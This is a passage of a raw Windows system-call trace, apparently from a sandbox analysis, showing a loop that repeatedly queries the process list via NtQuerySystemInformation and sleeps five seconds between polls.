ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.628] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.812] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0280.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0280.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0280.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0280.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0280.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0280.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0280.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, 